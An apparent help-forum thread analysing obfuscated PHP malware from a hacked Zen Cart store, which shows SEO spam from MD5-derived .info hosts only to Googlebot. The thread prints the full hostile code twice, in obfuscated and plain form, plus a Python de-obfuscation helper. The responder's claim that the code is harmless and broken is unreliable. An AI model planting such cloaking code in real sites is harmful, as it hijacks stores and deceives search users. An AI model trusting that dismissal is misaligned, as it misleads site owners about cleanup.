  • Status: Solved
  • Priority: Medium
  • Security: Public

Zen Cart store PHP hacked, need help analyzing code

Hello, I'm helping a client with a hacked store. I found an eval(base64_decode(...)) call, so I decoded it myself and came up with the resulting code. We discovered the code when Google's cache indicated that it was presenting unsavory links ONLY to the Google search indexer and not to normal browsers. I need help analyzing it to understand what else it does and what else needs to be cleaned.

Any help would be greatly appreciated!
// Below is the base64-decoded string (comments added: each hashed variable
// holds a function or key name assembled from chr() calls)

$_439ec1cb0f1656c6617f41d88cf94830 = chr(115).chr(117).chr(98).chr(115).chr(116).chr(114); // 'substr'
$_2938297da3b9a834030705b3aa59d93a = chr(109).chr(100).chr(53); // 'md5'
$_ba30428b6c049208a76657c6480b7ddf = chr(102).chr(115).chr(111).chr(99).chr(107).chr(111).chr(112).chr(101).chr(110); // 'fsockopen'
$_ecaa7596b439b9af60cc983b2067fabc = chr(102).chr(112).chr(117).chr(116).chr(115); // 'fputs'
$_91588db553ad4b8cc624d1cf6fadf368 = chr(102).chr(103).chr(101).chr(116).chr(115); // 'fgets'
$_1d342bc8a8990aae1ed29b52fd51338c = chr(115).chr(116).chr(114).chr(115).chr(116).chr(114); // 'strstr'
$_a320eb60651b291ca479f43a8856b73a = chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82); // '_SERVER'
$_5a672364743eba1bc07363e4bfced05c = $$_a320eb60651b291ca479f43a8856b73a; // variable variable: $_SERVER

// Only runs when the visitor identifies itself as Googlebot:
// strstr($_SERVER['HTTP_USER_AGENT'], 'Googlebot')
if($_1d342bc8a8990aae1ed29b52fd51338c($_5a672364743eba1bc07363e4bfced05c[chr(72).chr(84).chr(84).chr(80).chr(95).chr(85).chr(83).chr(69).chr(82).chr(95).chr(65).chr(71).chr(69).chr(78).chr(84)], chr(71).chr(111).chr(111).chr(103).chr(108).chr(101).chr(98).chr(111).chr(116))) {
 // Try eight candidate hosts, one per counter value 458567..458574
 for($_a2efef6c3e0c659266a3612f08e0f219=458567;$_a2efef6c3e0c659266a3612f08e0f219<458575;$_a2efef6c3e0c659266a3612f08e0f219++) {
  // host = substr(md5($i), 0, 16) . '.info'
  $_37aa5f149a6572e7fb03eb18e150c6dc = $_439ec1cb0f1656c6617f41d88cf94830($_2938297da3b9a834030705b3aa59d93a($_a2efef6c3e0c659266a3612f08e0f219), 0, 16) . chr(46).chr(105).chr(110).chr(102).chr(111);
  // $sock = fsockopen($host, '80')
  $_002a8c508b8e2392e60bb9ffeece46c0=$_ba30428b6c049208a76657c6480b7ddf($_37aa5f149a6572e7fb03eb18e150c6dc, chr(56).chr(48));
  if(!$_002a8c508b8e2392e60bb9ffeece46c0) 
   continue;
  // fputs($sock, "GET /9dddf2a4f7d94594ec2ea98407a410e1 HTTP/1.1\r\nHost: $host\r\nReferer: http://" . $_SERVER['SERVER_NAME'] . <intended $_SERVER['REQUEST_URI']> . "\r\n\r\n")
  // i.e. the crawled store page is reported to the remote host in the Referer header
  $_ecaa7596b439b9af60cc983b2067fabc($_002a8c508b8e2392e60bb9ffeece46c0, chr(71).chr(69).chr(84).chr(32).chr(47).chr(57).chr(100).chr(100).chr(100).chr(102).chr(50).chr(97).chr(52).chr(102).chr(55).chr(100).chr(57).chr(52).chr(53).chr(57).chr(52).chr(101).chr(99).chr(50).chr(101).chr(97).chr(57).chr(56).chr(52).chr(48).chr(55).chr(97).chr(52).chr(49).chr(48).chr(101).chr(49).chr(32).chr(72).chr(84).chr(84).chr(80).chr(47).chr(49).chr(46).chr(49)."\r\n".chr(72).chr(111).chr(115).chr(116).chr(58).chr(32).$_37aa5f149a6572e7fb03eb18e150c6dc."\r\n".chr(82).chr(101).chr(102).chr(101).chr(114).chr(101).chr(114).chr(58).chr(32).chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47) . $_5a672364743eba1bc07363e4bfced05c[chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(95).chr(78).chr(65).chr(77).chr(69)] . $$_a320eb60651b291ca479f43a8856b73a[chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(95).chr(85).chr(82).chr(73)]."\r\n\r\n");
  $_fc5c9462e5e78a93bde7df3182d2f1ee=0; // flag: inside the '-----' delimited part of the response
  // while($line = fgets($sock, 1024))
  while($_f41b8a7eec9e13339d27d6f86193bdc4 = $_91588db553ad4b8cc624d1cf6fadf368($_002a8c508b8e2392e60bb9ffeece46c0, 1024)) {
   if($_fc5c9462e5e78a93bde7df3182d2f1ee) {
    // second '-----' line ends the injected content
    if($_1d342bc8a8990aae1ed29b52fd51338c($_f41b8a7eec9e13339d27d6f86193bdc4,chr(45).chr(45).chr(45).chr(45).chr(45))){
     break;
    }
    echo($_f41b8a7eec9e13339d27d6f86193bdc4); // fetched content is written into the page served to the crawler
   }
   // first '-----' line starts the injected content
   if($_1d342bc8a8990aae1ed29b52fd51338c($_f41b8a7eec9e13339d27d6f86193bdc4,chr(45).chr(45).chr(45).chr(45).chr(45))) {
    $_fc5c9462e5e78a93bde7df3182d2f1ee=1;
    continue;
   }
  }
  // stop once one host has delivered content
  if($_fc5c9462e5e78a93bde7df3182d2f1ee)
   break;
 }
}

Asked by: MeridianManagement

1 Solution

CSecurity commented:
Here is the decoded PHP code:

When it finds the user agent is Googlebot, it tries to connect to a lot of MD5-derived hosts with a .info extension; if it connects successfully, it sends the URL, referrer, etc. to that server.

Funny one! It has a lot of bugs; for example, when it sends the HTTP/1.1 request it doesn't put \r\n after it.

Nothing to worry about...
if(strstr($_SERVER['HTTP_USER_AGENT'], 'Googlebot')) { // only for visitors claiming to be Googlebot
 for($i=458567;$i<458575;$i++) {
  $var1 = substr(md5($i), 0, 16).".info"; // candidate host derived from the counter
  $sock=fsockopen($var1, 80);
  if(!$sock)
   continue;
  // request a fixed path on that host, reporting which store page was crawled in the Referer
  fputs($sock, "GET /9dddf2a4f7d94594ec2ea98407a410e1 HTTP/1.1 Host: ".$var1."\r\n"."Referer: http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."\r\n\r\n");
  $var2=0; // set once the first '-----' marker line has been seen
  while($recv = fgets($sock, 1024)) {
   if($var2) {
    if(strstr($recv,'-----')){ // closing marker
     break;
    }
    echo($recv); // content between the markers is written into the page
   }
   if(strstr($recv,'-----')) { // opening marker
    $var2=1;
    continue;
   }
  }
  if($var2) // stop after the first host that answered with content
   break;
 }
}

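As an added example (not code from the thread or from Zen Cart), a small Python helper that does what the thread does by hand: it folds chr() chains into string literals, renames the hashed variables, flags the obfuscation and crawler-gating patterns discussed above, and rebuilds the eight contact hosts from substr(md5($i), 0, 16) . '.info' so they can be blocked or searched for in outbound-connection and DNS logs. The SAMPLE excerpt is constructed in the style of the posted code, and the function names are assumptions.

```python
import hashlib
import re

# Constructed excerpt in the style of the obfuscated code posted above (not the full sample)
SAMPLE = (
    "$_439ec1cb0f1656c6617f41d88cf94830 = chr(115).chr(117).chr(98).chr(115).chr(116).chr(114);\n"
    "$_a320eb60651b291ca479f43a8856b73a = chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82);\n"
    "$_5a672364743eba1bc07363e4bfced05c = $$_a320eb60651b291ca479f43a8856b73a;\n"
    "if(strstr($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(85).chr(83).chr(69).chr(82)"
    ".chr(95).chr(65).chr(71).chr(69).chr(78).chr(84)], chr(71).chr(111).chr(111).chr(103)"
    ".chr(108).chr(101).chr(98).chr(111).chr(116))) {\n"
)

CHR_CHAIN = re.compile(r"chr\(\d+\)(?:\s*\.\s*chr\(\d+\))*")
HASHED_VAR = re.compile(r"\$_[0-9a-f]{32}")
INDICATORS = {
    "eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "chr_chain": re.compile(r"(?:chr\(\d+\)\s*\.\s*){3,}chr\(\d+\)"),
    "crawler_gating": re.compile(r"HTTP_USER_AGENT.{0,80}Googlebot", re.S),
}

def fold_chr_chains(php_src: str) -> str:
    """Replace each chr(n).chr(n)... run with the single-quoted PHP string it builds."""
    def to_literal(m: re.Match) -> str:
        text = "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0)))
        return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"
    return CHR_CHAIN.sub(to_literal, php_src)

def rename_hashed_vars(php_src: str) -> str:
    """Rename $_<md5> variables to $v1, $v2, ... in order of first appearance."""
    names = {}
    return HASHED_VAR.sub(lambda m: names.setdefault(m.group(0), f"$v{len(names) + 1}"), php_src)

def deobfuscate(php_src: str) -> str:
    return rename_hashed_vars(fold_chr_chains(php_src))

def flag_indicators(php_src: str) -> list:
    """Which of the patterns from this thread appear in php_src (checked raw and after folding)."""
    text = php_src + "\n" + fold_chr_chains(php_src)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def derive_contact_domains(start: int = 458567, stop: int = 458575) -> list:
    """Rebuild the host list the script iterates: substr(md5($i), 0, 16) . '.info'."""
    return [hashlib.md5(str(i).encode()).hexdigest()[:16] + ".info" for i in range(start, stop)]

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(flag_indicators(SAMPLE), derive_contact_domains())
```

Running fold_chr_chains over the full posted block recovers the same plain code as the answer below, and the domain list is the set of indicators to search for in the server's firewall or proxy logs.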
MeridianManagement (Author) commented:
Thanks for the analysis.

The line that shows /9dddf2a4f7d94594ec2ea98407a410e1: is that referring to another file on the server?

You're saying it's trying a lot of MD5 hosts, but where is it getting the addresses for these hosts? I'm not sure I understand how you can connect to a host whose address is encrypted with MD5.

Do you think there are other areas I need to clean, or does this appear to be contained?
CSecurity commented:
Look, calculate the MD5 of a number, like 4558, and assume it's a9438938a889a839 etc. This code tries to connect to that string plus .info, on port 80.

That /9dddf2a4f7d94594ec2ea98407a410e1 is on the hacker's site; yes, that file is on that server. As I said, nothing to worry about, it's buggy, non-working code.